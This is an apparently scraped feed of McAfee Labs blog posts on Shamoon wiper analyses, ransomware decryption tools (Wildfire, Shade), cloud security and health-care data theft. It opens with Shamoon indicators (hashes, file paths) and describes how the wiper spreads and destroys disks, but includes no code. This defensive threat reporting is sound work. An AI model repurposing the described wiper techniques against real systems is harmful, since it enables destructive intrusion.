  • 146a112cb01cd4b8e06d36304f6bdf7b
  • bf4b07c7b4a4504c4192bd68476d63b5
  • a96d211795852b6b14e61327bbcc3473
  • 1507A4FDF65952DFA439E32480F42CCF1460B96F

File locations and filenames:

Collection of system information:

  • “%localappdata%\Microsoft\Windows\Tmp765643.txt” //where Tmp[6digits].txt is the syntax//

Filenames and Locations:

  • Microsoft\Windows\ccd
  • Microsoft\Windows\ccd6.exe”
  • Microsoft\Windows\ssc”
  • Microsoft\Windows\tss.ps1″
  • Microsoft\Windows\Tmp9932u1.bat”
  • Microsoft\Windows\Tmp765643.txt”
  • Microsoft\Windows\dp.ps1″
  • Microsoft\Windows\ccd61.ps1
  • Microsoft\Windows\dp.ps1″

Interesting strings in code samples:

  • F:\Projects\Bot Fresh\Release\Bot Fresh.pdb
  • F:\Projects\Bot\Bot\Release\Ism.pdb
  • G:\Projects\Bot\Bots\Bot5\Release\Ism.pdb

 

The post Spotlight on Shamoon appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/spotlight-on-shamoon/feed/ 1
STAR- A Window to the Cloud https://securingtomorrow.mcafee.com/business/cloud-security/star-window-cloud/ https://securingtomorrow.mcafee.com/business/cloud-security/star-window-cloud/#respond Thu, 19 Jan 2017 19:20:22 +0000 https://securingtomorrow.mcafee.com/?p=68072 We are all going to live in the cloud.   Well that is what every study, and forecast tells us.  From our clash of clans villages, to our connected cars we can expect all of our data to be hosted in an unmarked data center in a town that we have never heard of.   Perhaps this […]

The post STAR- A Window to the Cloud appeared first on McAfee Blogs.

]]>
We are all going to live in the cloud.   Well that is what every study, and forecast tells us.  From our clash of clans villages, to our connected cars we can expect all of our data to be hosted in an unmarked data center in a town that we have never heard of.   Perhaps this is a slight exaggeration, but the reality is for many of us, we simply have no idea where our data will be stored, and indeed even if we are given the name of a physical location have little insight into the operational procedures, staff vetting, or even physical security employed at the location.   This old chestnut is described as the lack of transparency, but the truth is that cloud service providers do remain transparent so long as you ask the question.

It sounds simple, and indeed by all accounts, major providers have entire teams dedicated to just that, answering questions from potential customers about the security controls deployed on site.   Such a process however is incredibly inefficient, and reminds me of how insurance used to work.   I remember getting the telephone book, and flicking to the section titled insurance.  There you would phone as many providers as you could answering questions about your car in order to find the most competitive quote.   With every call, you felt a small part of your youth just ebbing away as your tolerance for small talk reduced with every quote.   In the end you were met with a saving of eleven pounds for three hours work.    Of course it was worth it wasn’t it?

In many cases every element of our industry is met with a similar fragmented approach, do you want to get a quote for staff training, well do a google search and contact every training company you have the patience to contact.   Differentiating the commoditized offerings such as insurance with price is simple, but deciding which company you want to host all of your corporate data, well that is a different matter.

It is for this reason that the Cloud Security Alliance, and in particular the Security, Trust & Assurance Registry (STAR) is such a valuable resource. This program encompasses key principles of transparency and a validation of the security posture of cloud offerings. The STAR program includes a complimentary registry that documents the security controls provided by popular cloud computing offerings. This publicly accessible registry is designed for users of cloud services to assess their cloud providers, security providers and advisory and assessment services firms in order to make the best procurement decisions. Now in one single place, potential cloud customers can gain insight into the security maturity of multiple providers in a single instance. Recognizing the need for greater transparency we are pleased to confirm that McAfee has our McAfee ePolicy Orchestrator Cloud STAR certified and will add others as they come online.

It is not question of whether the cloud will be ubiquitous, but whether we can ensure that the data centers holding every detail of our business or personal life have the appropriate level of protection.   The STAR initiative is integral into providing a foundation for anybody considering using such services, but more importantly the CSA has been at the forefront of cloud security.

So if you are considering outsourcing your work, make sure that STAR is your first port of call, and should consider attending the CSA Summit at RSA this year on February 13 where I will be sharing my thoughts on “Security in the Cloud: Evolution or Revolution?”

The post STAR- A Window to the Cloud appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/cloud-security/star-window-cloud/feed/ 0
Shamoon Rebooted in Middle East, Part 2 https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/shamoon-rebooted-middle-east-part-2/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/shamoon-rebooted-middle-east-part-2/#respond Fri, 09 Dec 2016 19:14:08 +0000 https://securingtomorrow.mcafee.com/?p=66974 Last week we provided some initial analysis on recent attacks targeting organizations in the Middle East.  The attack has hallmarks of the Shamoon campaign of 2012. We now have additional data related to the components used within the new campaign, which has three distinct components: dropper, wiper, and wiper driver. The language of these three […]

The post Shamoon Rebooted in Middle East, Part 2 appeared first on McAfee Blogs.

]]>
Last week we provided some initial analysis on recent attacks targeting organizations in the Middle East.  The attack has hallmarks of the Shamoon campaign of 2012. We now have additional data related to the components used within the new campaign, which has three distinct components: dropper, wiper, and wiper driver.

The language of these three components—PKCS12 (wiper), PKCS7, and X509—is lang:9217, which translates to Yemeni Arabic. We also see both 32- and 64-bit versions.

The malware spreads over the network using the IPC$ share and embedded administrator credentials from the targeted organization, so we can assume that the attackers already had a beachhead to gather these credentials from one of the samples. The password was also very strong, another indicator that the attackers might have had network access to compromise passwords and accounts. Indeed, our Foundstone team, which has conducted significant work on both campaigns, has confirmed individuals (not related to the attacks) who have shown off their technical prowess by publicizing the compromised credentials on public forums.

The malware tries to disable the user account control, verifies if it is connected with admin credentials, and drops the payload in the System32 folder. Another run option is to use the AT command and schedule a job to execute the payload.

Wiping function

The wiper component was hardcoded to start Thursday, November 17 at 20:45, after the beginning of Saudi Arabia’s Friday holiday, when most employees have left and after the evening prayer time.

The wiper component verifies the date and extracts the wiper component to System32 using the same random names as generated by the Shamoon code from 2012. The wiper has three options for deletion: F, E, and R. The F option wipes the data with the JPEG of the Syrian refugee boy Alan Kurdi lying drowned on the beach. The E and R option wipe using random values. Shamoon 1 used a JPEG of a burning US flag.

Also during the mass deletion, the wiper uses the Eldos RawDisk driver to change the system time to August 2012, probably to not allow the expiration of the trial period of the temporary license for the software.

We have found many similarities between the 2012 attack and this recent campaign. There are a few alterations to the code and political themes, but overall we see a similar framework and process.

Detection

In cooperation with McAfee Labs we can confirm that all related samples of this attack are detected by the signature DistTrack![partial-hash].

The driver used for the wiper is legitimate software. Thus this threat carries the on-screen warning Possibly Unwanted Program. We will continue our analysis, particularly as our Foundstone team identifies additional indicators.

The post Shamoon Rebooted in Middle East, Part 2 appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/shamoon-rebooted-middle-east-part-2/feed/ 0
Shamoon Rebooted? https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/shamoon-rebooted/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/shamoon-rebooted/#respond Tue, 29 Nov 2016 12:15:24 +0000 https://securingtomorrow.mcafee.com/?p=66683 We have recently received notifications and samples from impacted organizations in the Middle East that have hallmarks of the Shamoon campaign from 2012. The main component of these attacks was the usage of a wiper component that, once activated, destroyed the hard disks of infected machines. The initial infection vector for the recent attacks is […]

The post Shamoon Rebooted? appeared first on McAfee Blogs.

]]>
We have recently received notifications and samples from impacted organizations in the Middle East that have hallmarks of the Shamoon campaign from 2012. The main component of these attacks was the usage of a wiper component that, once activated, destroyed the hard disks of infected machines.

The initial infection vector for the recent attacks is unknown. Analyzing the submitted files, we started to recognize similar tactics and procedures that we discovered in 2012.

When the initial executable is run, it creates a copy of itself in the %SystemRoot%\System32 folder using the name trksrv.exe and starts itself as a new service.

After the trksvr service has starts, it drops files, in either a 32- or 64-bit version, depending on the system of the victim. Reverse engineering one of the binaries, we discovered the following random-name examples that could be used for these 32- or 64-bit binaries:

  • ntdsutl.exe
  • power.exe
  • rdsadmin.exe
  • regsys.exe
  • sigver.exe
  • routeman.exe
  • ntnw.exe
  • netx.exe
  • fsutl.exe
  • extract.exe

Some of these filenames are the same as those used in the first Shamoon attack; other filenames are new.

This dropped executable is the wiper module and is responsible for overwriting various files on the hard disk and also the master boot record and boot sector.

The wiper module also drops the file drdisk.sys, which is a standard component from a commercial application (Eldos) that allows programs low-level access to hard disk drives. This driver was used in the first Shamoon attack, and again in this new campaign.

The wiper module initiates an enumeration of files on the victim’s disk and writes the results to a file with the extension “.pnf,” the file that the wiper module will use as an input for which files to wipe.

We are continuing our investigation into this campaign, and intend to publish further analyses.

McAfee Labs detects samples with the following names:

  • W32/DistTrack
  • Artemis detection
  • DistTrack!sys
  • Trojan-FKIQ![hash]
  • Trojan-FKIR![hash]

 

 

The post Shamoon Rebooted? appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/shamoon-rebooted/feed/ 0
Fight Against Ransomware Takes to the Cloud https://securingtomorrow.mcafee.com/business/cloud-security/fight-ransomware-takes-cloud/ https://securingtomorrow.mcafee.com/business/cloud-security/fight-ransomware-takes-cloud/#respond Tue, 08 Nov 2016 00:05:38 +0000 https://securingtomorrow.mcafee.com/?p=64279 “How many visitors do you expect to access the No More Ransom Portal?” This was the simple question asked prior to this law enforcement (Europol’s European Cybercrime Centre, Dutch Police) and private industry (Kaspersky Lab, McAfee) portal going live, which I didn’t have a clue how to answer. What do YOU think? How many people […]

The post Fight Against Ransomware Takes to the Cloud appeared first on McAfee Blogs.

]]>
“How many visitors do you expect to access the No More Ransom Portal?”

This was the simple question asked prior to this law enforcement (Europol’s European Cybercrime Centre, Dutch Police) and private industry (Kaspersky Lab, McAfee) portal going live, which I didn’t have a clue how to answer. What do YOU think? How many people do you expect to access a website dedicated to fighting ransomware? If you said 2.6 million visitors in the first 24 hours, then please let me know six numbers you expect to come up in the lottery this weekend (I will spend time until the numbers are drawn to select the interior of my new super yacht). I have been a long-time advocate of public cloud technology, and its benefit of rapid scalability came to the rescue when our visitor numbers blew expected numbers out of the water. To be honest, if we had attempted to host this site internally, my capacity estimates would have resulted in the portal crashing within the first hour of operation. That would have been embarrassing and entirely my fault.

Indeed, my thoughts on the use of cloud computing technology are well documented in various blogs, my work within the Cloud Security Alliance, and the book I recently co-authored. I have often used the phrase, “Cloud computing in the future will keep our lights on and water clean.” The introduction of Amazon Web Services (AWS) and AWS Marketplace into the No More Ransom Initiative to host the online portal demonstrates that the old myth, “One should only use public cloud for noncritical services,” needs to be quickly archived into the annals of history.

To ensure such an important site was ready for the large influx of traffic at launch, we had around-the-clock support out of Australia and the U.S. (thank you, Ben Potter and Nathan Case from AWS!), which meant everything was running as it should and we could handle millions of visitors on our first day. This, in my opinion, is the biggest benefit of the cloud. Beyond scalability, and the benefits of outsourcing the management and the security of the portal to a third party, an added benefit was that my team and I could focus our time on developing tools to decrypt ransomware victims’ systems, conduct technical research, and engage law enforcement to target the infrastructure to make such keys available.

AWS also identified controls to reduce the risk of the site being compromised. With the help of Barracuda, they implemented these controls and regularly test the portal to reduce the likelihood of an issue.

Thank you, AWS and Barracuda, and welcome to the team! This open initiative is intended to provide a noncommercial platform to address a rising issue targeting our digital assets for criminal gain. We’re thrilled that we are now able to take the fight to the cloud.

Originally published on Amazon Web Services

The post Fight Against Ransomware Takes to the Cloud appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/cloud-security/fight-ransomware-takes-cloud/feed/ 0
A ‘Second Economy’ Prognosis for Health Care Cybersecurity https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/second-economy-prognosis-health-care-cybersecurity/ Wed, 26 Oct 2016 19:01:39 +0000 https://blogs.mcafee.com/?p=53497 McAfee CTO Steve Grobman has pointed out that gaining the upper hand in cybersecurity requires that we extend our thinking beyond the physical economy of money, assets, goods, and services to a Second Economy defined by the currencies of trust, time, and money. As in other industries, health care is working toward maximizing efficiencies, containing […]

The post A ‘Second Economy’ Prognosis for Health Care Cybersecurity appeared first on McAfee Blogs.

]]>
McAfee CTO Steve Grobman has pointed out that gaining the upper hand in cybersecurity requires that we extend our thinking beyond the physical economy of money, assets, goods, and services to a Second Economy defined by the currencies of trust, time, and money.

As in other industries, health care is working toward maximizing efficiencies, containing expenses, capturing revenues, and delivering enhanced services through networked devices. Unfortunately, the new opportunities also involve challenges born of a reliance on fragmented cybersecurity strategies built around siloed architectures, and a failure to recognize the value of the extensive data stores the health care sector manages. Losing intellectual property and business confidential information could destroy whole pharmaceutical or biotech companies. Losing personal, sensitive patient data could squander the precious currency of trust in digital medicine, in care providers, and their application of technology.

A McAfee Labs report released today details some of the consequences of health care industry players failing to appreciate the value of data, the attractiveness of that data to cybercriminals, and the ecosystem growing around the theft of such data. The report, Health Warning: Cyber Threats Targeting and Compromising the Health Industry, features three areas of focus.

The value of protected health information

In recent years, McAfee has observed the cybercriminal community extend its data theft efforts beyond financial account data to medical records.

Although credit and debit card numbers can be canceled and replaced quickly, this is not the case for protected health information (PHI) that does not change. This “nonperishable” PHI could include family names, mothers’ maiden names, social security or pension numbers, payment card and insurance data, and patient address histories. McAfee Labs found stolen medical records available for from $0.03 to $2.42 per record.

Cybercriminals analyze the data, and perhaps cross-reference it with data stolen from other sources to identify lucrative fraud, theft, extortion, character assassination, or blackmail opportunities across the population of patients.

Targeting intellectual property

Our research and analysis on the targeting of biotechnology and pharmaceutical firms suggest that the economic value of their intellectual property and business confidential information is considerably higher than the cents- and dollars-per-record data McAfee’s researchers identified within patients health care accounts.

When you consider that research and development is a tremendous expense for these industries, it should be no surprise that cybercriminals are attracted to this category of data theft.

McAfee researchers found evidence that formulas for next-generation drugs, drug trial results, and other business confidential information constitutes significant value. The stores of such data at pharmaceutical companies, their partners, and even government regulators involved in bringing new drugs to market have become premium targets of cybercriminals.

Ecosystem of health care data theft

McAfee also identified cybercriminals leveraging the cybercrime-as-a-service market to execute their attacks on health care organizations. Researchers found evidence of the purchase and rental of exploits and exploit kits to enable the system compromises behind health care data breaches. The researchers even observed efforts by cybercriminals, through online ads and social media, to recruit into their ranks health care industry insiders with access to valuable information.

The Second Economy challenge

The growth and evolution of the market for stolen health care data and the hacking skills required to steal it suggest that the business of cybercrime in this vertical industry is good and growing. Given the increasing threat to the industry, breach costs ought to be evaluated in new Second Economy terms—in which lost trust can inflict as much damage upon individuals and organizations as lost funds.

In health care, gaining the upper hand in cybersecurity means rejecting conventional defense paradigms in favor of radical new thinking. Where health care organizations have relied on old playbooks, they must be newly unpredictable. Where they have hoarded information on attacks, exploits, and threats, the industry must become more collaborative. Where they have undervalued cyber defense overall, they must prioritize it.

In the Second Economy, trust is the prime casualty of cybercrime. In an industry in which the personal is paramount, the loss of trust could be catastrophic to its progress and prospects for success.

The post A ‘Second Economy’ Prognosis for Health Care Cybersecurity appeared first on McAfee Blogs.

]]>
Wild West of Cybercrime: New Sheriff in Town https://securingtomorrow.mcafee.com/business/wild-west-cybercrime-new-sheriff-town/ Mon, 17 Oct 2016 16:01:05 +0000 https://blogs.mcafee.com/?p=53412 Your data is held hostage by criminals.  Do you a) pay them, or b) lose your data forever? Until recently these were the only options for the many victims of ransomware. That was until July 2016 when law enforcement and private sector got together to launch the NoMoreRansom portal. Not only does it provide advice […]

The post Wild West of Cybercrime: New Sheriff in Town appeared first on McAfee Blogs.

]]>
Your data is held hostage by criminals.  Do you a) pay them, or b) lose your data forever?

Until recently these were the only options for the many victims of ransomware. That was until July 2016 when law enforcement and private sector got together to launch the NoMoreRansom portal. Not only does it provide advice on how to best prevent such infections, it also provides a set of tools that allow victims to decrypt their data. This provided a third option to victims: c) don’t pay the bad guys and get your data back.

Progress has been impressive, because since July the number of tools have doubled to more than eight ransomware families. These tools have successfully decrypted over 2,500 infections in such a short time. Now to put this into context, this means that there were more than 2,000 instances in which people did not have to pay criminals to get their data back. Subsequently the portal was responsible for preventing in excess of €1 million going into the pockets of criminals.

All of which brings us to today. We have launched the portal with the European Cybercrime Centre, Dutch Police, Kaspersky Lab, and McAfee. Now we are delighted to announce the inclusion of 13 new partners from law enforcement: in Bosnia and Herzegovina, Bulgaria, Colombia, France, Hungary, Ireland, Italy, Latvia, Lithuania, Portugal, Spain, Switzerland and the United Kingdom.

We often hear talk of public-private partnerships and although this rhetoric is often lauded, this initiative demonstrates a true practical example of this approach, and what can be achieved when we work together—not only in creating tools to return data held hostage, but also in raising awareness of ransomware by providing proactive measures to prevent infections.

Ransomware is a growth industry. One can argue it is the poster child of modern cybercrime, with huge revenues for criminals. It impacts consumers, and now specifically targeting sectors such as education, health care, and government. It has a detrimental effect on modern businesses across the globe. Without our taking a stand ransomware will continue to fund criminal activities and motivate cybercriminals to invest more in further nefarious initiatives. We must all take a stand, whether this is industry providing technical support to law enforcement in their efforts to disrupt criminal infrastructure, or an infected victim simply not paying and using the tools provided by NoMoreRansom.

We all have a role in this fight. NoMoreRansom may appear to be only a website fighting ransomware, but in truth it represents so much more.

The post Wild West of Cybercrime: New Sheriff in Town appeared first on McAfee Blogs.

]]>
‘Wildfire’ Ransomware Extinguished by Tool From NoMoreRansom; Unlock Files for Free https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/wildfire-ransomware-extinguished-tool-nomoreransom-unlock-files-free/ Tue, 23 Aug 2016 18:30:41 +0000 https://blogs.mcafee.com/?p=52251 McAfee and Kaspersky Lab, partners in the project NoMoreRansom, are pleased to announce today the availability of a decryption tool for victims of the Wildfire variant of ransomware. This tool is available following successful collaboration with the Dutch police and the European Cybercrime Centre. This strong public-private partnership has led to the seizure of criminal […]

The post ‘Wildfire’ Ransomware Extinguished by Tool From NoMoreRansom; Unlock Files for Free appeared first on McAfee Blogs.

]]>
McAfee and Kaspersky Lab, partners in the project NoMoreRansom, are pleased to announce today the availability of a decryption tool for victims of the Wildfire variant of ransomware. This tool is available following successful collaboration with the Dutch police and the European Cybercrime Centre. This strong public-private partnership has led to the seizure of criminal infrastructure and has resulted in the availability of the decryption tool.

Victims of this variant of ransomware know if they have been infected with Wildfire because they will see the following message:

20160823 Wildfire 1

Ransomware notice.

Most of the victims of Wildfire are in the Netherlands and Belgium. Although this message requests a ransom of 1.5 Btc, reality is that most victims paid between 0.5 and 0.6 Btc. Apparently, the actors accepted in some cases a negotiation.

Wildfire has spread primarily through Dutch spam emails from transport companies, targeted at Dutch speakers. The victims were misled with a notice of a “missed” delivery and instructions for scheduling a new delivery by filling in a “special form” attached with the mail. This form was in fact an obfuscated dropper that infects the victims with the ransomware. The following screenshot is typical of the many spam mails:

20160823 Wildfire 2

Spam email aimed at Dutch speakers.

The domain transportbedrijfpeters.nl, used in the preceding mail, was first seen on May 17 by a P.O. Box company in the United Arab Emirates. May 18 was the date of the spam mail. There is nothing illegal about this, but it raises a lot of suspicion.

The domains used in all the Wildfire spam mails that we researched were registered between the end of May and August this year, the height of the Wildfire campaign. Another remarkable thing about the spam mails is that they contain addresses of real businesses in the Netherlands.

The actors behind Wildfire have clearly put a lot of effort into making their spam mails look credible and very specific. Because of these elements, we would not be surprised if there is a Dutch-speaking group involved.

Once victims are infected, they see the ransom note, as shown above. To make the payment, the victim has to connect to a .RU or .SU domain. These domains act as a proxy to connect the victim to the control server, which was hosted on the Dark web. We believe that the actors did this to avoid the detection of search bots and having the site appear in popular search engines, and to be as stealthy as possible when accessing their services.

Thanks to our public-private partnership we were able to take a look at Wildfire’s control server panel. The main panel has the following campaign details:

20160823 Wildfire 3

Wildfire campaign overview.

We see from this overview that in the last 31 days the campaign has infected 5,309 systems and earned total revenue of about BTC136 (€70,332). Not a bad “paycheck” for a month.

When we look at the “clients” page, we see details of the amount of encrypted files, their BTC address, files encrypted, and country:

ID UID Country BTCaddress BTCamount Filecount Paidstatus
1 a5***** BE 1J*************** 0.6 11673 0
2 aa***** NL 1F*************** 0.5 1469031280 0
3 fd***** BE 1H*************** 0.6 68595 0
4 08***** NL ZC*************** 0.5 1469079732 0
5 05**** NL GH************** 0.5 1469605876 0

Overview of victims’ file data.

A table marked as RID with the value “aff_001” might indicate an affiliate program, in which “aff_001” could stand for “Affiliate_001.”

When we take a closer look at the source code of the control server, we see some indicators that make us believe Wildfire is an affiliate-based ransomware-as-a-service (RaaS). The index.php page of the server contains a comment in Russian:

20160823 Wildfire 4

Russian comments on the control server.

The Cyrillic text “исправить таймер” means “fix timer” and refers to the timer function of the ransomware. Another indicator in the config file of the source code is a list of exempted countries. Wildfire will not encrypt victims from certain countries.

20160823 Wildfire 5

Exempted countries in Eastern Europe.

This list is a strong indicator that we are dealing with an Eastern European group. This is not surprising; we have seen this behavior with many other ransomware variants, including CryptoWall.

We would not be surprised if Wildfire is indeed an example of RaaS. The malware shows a very close resemblance to the ransomware variant Zyklon. Another possible giveaway is the difference between the source code found on the control server and the very specific Dutch/Belgium infection vectors found in the spam mails. They are too far apart in language to come from the same actor group. It is worrisome to see large-scale extortion by ransomware made easily available to so many criminals.

Today, however, the victims of Wildfire no longer have to face the difficult choice of either paying criminals or sacrificing their data. The availability of this decryption tool allows victims to reclaim their data without having to pay anyone. The initial tool includes 1,600 keys for Wildfire and more will be added in the near future. The is another result of the NoMoreRansom public-private partnership.

The post ‘Wildfire’ Ransomware Extinguished by Tool From NoMoreRansom; Unlock Files for Free appeared first on McAfee Blogs.

]]>
McAfee Teams With Industry, Law Enforcement to Thwart ‘Shade’ Ransomware https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-teams-industry-law-enforcement-thwart-shade-ransomware/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-teams-industry-law-enforcement-thwart-shade-ransomware/#respond Mon, 25 Jul 2016 09:00:12 +0000 https://blogs.mcafee.com/?p=51474 McAfee, Europol, Kaspersky Lab, and Dutch police have taken down the Shade ransomware botnet and captured encryption keys to unlock victims’ systems. Although we talk a great deal of the value of public-private partnerships in the fight against cybercrime, few events in the cybersecurity field are more inspiring than seeing such collaboration in action and scoring […]

The post McAfee Teams With Industry, Law Enforcement to Thwart ‘Shade’ Ransomware appeared first on McAfee Blogs.

]]>
McAfee, Europol, Kaspersky Lab, and Dutch police have taken down the Shade ransomware botnet and captured encryption keys to unlock victims’ systems.

Although we talk a great deal of the value of public-private partnerships in the fight against cybercrime, few events in the cybersecurity field are more inspiring than seeing such collaboration in action and scoring wins.

Today, McAfee announces a collaborative victory with Europol, Kaspersky Lab, and the Dutch police’s National High Tech Crime Unit (NHTCU). Together these players have successfully taken down the control servers operating the Shade ransomware. Furthermore, McAfee and Kaspersky Lab have leveraged cryptographic keys captured in the takedown to develop decryption tools capable of unlocking systems infected by the ransomware. These tools are available free of charge as a part of the “No-More-Ransom” project, an initiative to share ransomware threat intelligence, coordinate malware campaign takedowns, educate users on how to protect themselves, report ransomware attacks, and provide tools to unlock infected systems.

The Shade ransomware first appeared in late 2014, infecting users across Eastern and Central Europe through malicious websites and infected email attachments. The respective McAfee and Kaspersky Lab tools will provide relief to users infected with Versions 1 or 2 of the Shade malware. The McAfee tool can be downloaded at http://www.mcafee.com/us/downloads/free-tools/shadedecrypt.aspx.

“This initiative shows the value of public-private cooperation in taking serious action in the fight against cybercrime,” said Raj Samani, EMEA CTO for McAfee. “This collaboration goes beyond intelligence sharing, consumer education, and takedowns to help repair the damage inflicted upon victims. By restoring access to their systems, we empower users by showing them they can take action and avoid rewarding criminals with ransom payments.”

After slowing slightly in mid-2015, ransomware overall regained its rapid growth rate. According to the June 2016 McAfee Labs Threats Report, total ransomware grew 116% year-over-year for the period ending March 31. Total ransomware rose 26% from Q4 2015 to Q1 2016 as lucrative returns continued to draw relatively low-skilled criminals. An October 2015 Cyber Threat Alliance analysis of the CryptoWall V3 ransomware hinted at the financial scale of such campaigns. The researchers linked just one campaign’s operations to $325 million in victims ransom payments.

 

For more information on the No-More-Ransom initiative, please visit www.nomoreransom.org.

For more information on how users can protect themselves from ransomware in general, please visit Ransomware and You.

More information on ransomware can be found at www.mcafee.com/ransomware.

The post McAfee Teams With Industry, Law Enforcement to Thwart ‘Shade’ Ransomware appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-teams-industry-law-enforcement-thwart-shade-ransomware/feed/ 0
The Morning After: What Happens to Data Post-Breach? https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/morning-happens-data-post-breach/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/morning-happens-data-post-breach/#respond Mon, 02 May 2016 19:13:17 +0000 https://blogs.mcafee.com/?p=49390 This post first appeared on the security website Dark Reading. We need consumers and businesses to not simply shrug off data breaches but to take active measures to protect their data. We are hopeful that new insights will provide a compelling answer to the question “So what?” No company is bulletproof when it comes to […]

The post The Morning After: What Happens to Data Post-Breach? appeared first on McAfee Blogs.

]]>
This post first appeared on the security website Dark Reading.

We need consumers and businesses to not simply shrug off data breaches but to take active measures to protect their data. We are hopeful that new insights will provide a compelling answer to the question “So what?”

No company is bulletproof when it comes to the compromise of data; this is the resounding message from Verizon’s 2016 Data Breach Investigations Report (DBIR). With statistics detailing how many records have been compromised, the fundamental question that is often overlooked is “So what?”

I don’t mean to sound indifferent, but it is a response that we often hear. “Banks refund me anyway” and “Well, it’s just another notification letter. I get these all the time” are common refrains. Feeling numb to the dizzying statistics is a dangerous trend that without correct education could have significant repercussions to the data subjects that have been impacted.

To assist with that education, we have coauthored one section of the DBIR that explains what happens with data after a breach, in particular the monetization of stolen data and their associated markets. (McAfee contributed to this report by providing anonymized breach data. We also coauthored Appendix A, which focuses on post-breach fraud and what happens to data once it has been stolen from the breached entity. The report and more about our contribution can be found here.)

One of the biggest challenges we face when attempting to explain market pricing for stolen data is that not all data is created equally. How can we normalize various stolen data sets to establish “market prices?” In short, we cannot. It is for this reason that we focused instead on specific data sets—payment card information, financial account information, and medical data.

What is particularly significant is how inexpensive it is to purchase this type of data, with payment cards selling for the price of a cup of coffee. However, we were surprised by the sharp drop in the price of stolen payment cards over the last several years. Apparently, the law of supply and demand applies to all markets, including the criminal marketplace. With so many recent confirmed payment card breaches, there is only one direction for the market price of these cards to move—downward!

We are hopeful that such insights provide a compelling answer to the question “So what?” As a society, we are increasingly dependent on digital systems. We need consumers and businesses to not simply shrug off data breaches but to take active measures to protect their data and not give criminals a shortcut to becoming millionaires. As the European Cybercrime Centre states in the report, “Only through a coordinated effort involving all parties will we be in a position to tackle this threat.”

The post The Morning After: What Happens to Data Post-Breach? appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/morning-happens-data-post-breach/feed/ 0
Is Cloud Security An Exaggerated Concern? https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/cloud-security-exaggerated-concern/ https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/cloud-security-exaggerated-concern/#respond Fri, 22 Apr 2016 13:00:43 +0000 https://blogs.mcafee.com/?p=49043 Research indicates the challenge has never been about security, but about transparency. The results are in: We have made zero progress since 2010. This was the year that IDC published results of a survey regarding cloud computing, and it found that security was the biggest barrier toward adoption. This statistic has found its way onto […]

The post Is Cloud Security An Exaggerated Concern? appeared first on McAfee Blogs.

]]>
Research indicates the challenge has never been about security, but about transparency.

The results are in: We have made zero progress since 2010. This was the year that IDC published results of a survey regarding cloud computing, and it found that security was the biggest barrier toward adoption. This statistic has found its way onto pretty much every presentation about cloud computing since 2010.

Well the year is 2016, and a recent McAfee study asked 1,200 IT decision-makers what their biggest concern is; the most common answer was data breaches. What is remarkable about this is that the next question in the survey asked respondents to comment on what issues they have experienced, and they were not security related. In fact, the biggest issue was the difficulty in migrating services or data. Incidentally, this is likely to get worse as the use of platform-as-a-service and infrastructure-as-a-service become more ubiquitous.

This does beg the question as to whether the issue of security concerns is exaggerated. Indeed, those of you that have heard me speak know that I do not believe the term “cloud security” is even an issue. Firstly, the concept of cloud is misused. If we strictly adhere to the NIST definition as per NIST 800-145, then the number of service providers offering a cloud service is a lot smaller than Google results suggest.

One of the key characteristics of a cloud provider (as per NIST) is to provide offering on-demand self-service. In 2012, the website CloudSleuth investigated how many cloud service providers actually fulfilled this characteristic; its research found that “of the 20 companies we selected in this round, only 11 were fully self-serve, nine required some level of sales interaction, and astoundingly, three of those nine simply didn’t respond to our requests.”

It’s About Transparency

So the term “cloud service provider” in practical terms is simply a company offering computing resources over broad network access. (Thank you, NIST!) Now let’s move to the concern regarding security. The question is not whether a provider is secure — moving away from the argument over what constitutes secure or not. The challenge is how to determine the level of security of a provider. Therefore, the challenge has never been about security, but about transparency; in other words, how can you determine the security posture of a third-party provider without the ability to physically audit? Of course, annual audits have been the default tool of choice for many years now, but this model only provides a certain level of assurance.

Work within the Cloud Security Alliance (with whom we collaborated on this research) has begun to develop the necessary tools to provide the transparency so desperately needed. For example, STAR is a registry that documents the security controls deployed by providers. But perhaps the most encouraging tool is STAR Continuous Monitoring, which provides transparency of the security posture of a provider even after the auditor has left the building.

Perhaps for 2017 the concern of cloud security will not make it onto the opening slide of every presentation, and we can discuss the adoption of tools such as STAR that provide the requisite transparency into third-party providers. If there is concern about the security of a cloud provider, then the simple answer will be not to use them and to find a provider that satisfies the risk appetite of the end customer.

Read the original post on Dark Reading.

The post Is Cloud Security An Exaggerated Concern? appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/cloud-security-exaggerated-concern/feed/ 0
A Future Beyond Mobile Devices; Trusting the Promises of Mobile World Congress https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/a-future-beyond-mobile-devices-trusting-the-promises-of-mobile-world-congress/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/a-future-beyond-mobile-devices-trusting-the-promises-of-mobile-world-congress/#comments Thu, 03 Mar 2016 18:41:19 +0000 https://blogs.mcafee.com/?p=47987 More than 100,000 people descended upon Mobile World Congress (MWC) last week to watch experts from around the world discuss and share their views of what the future has in store for “mobile.” After four days at the event, what became obvious to me is that we have certainly progressed from the days when a […]

The post A Future Beyond Mobile Devices; Trusting the Promises of Mobile World Congress appeared first on McAfee Blogs.

]]>
More than 100,000 people descended upon Mobile World Congress (MWC) last week to watch experts from around the world discuss and share their views of what the future has in store for “mobile.”

